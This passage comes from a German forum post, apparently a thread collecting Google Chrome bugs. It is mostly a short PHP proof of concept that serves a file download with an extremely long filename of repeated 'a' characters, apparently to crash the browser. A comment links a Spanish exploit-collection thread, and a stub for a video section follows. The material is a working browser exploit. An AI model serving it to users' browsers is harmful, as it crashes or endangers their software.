aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.psd';
    $contenido = 'prueba';
    header("Content-Type: application/octet-stream");
    header("Content-Disposition: attachment; filename=$nombre");
    print($contenido);
     
    /*
    http://www.jccharry.com/pruebas/Google%20Chrome/2.php
    http://foro.elhacker.net/bugs_y_exploits/recopilatorio_de_bugsexploits_en_google_chrome_win32-t226450.0.html
    */
     
    ?>
    
    

    und noch x mehr.,.,.
     
  26. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.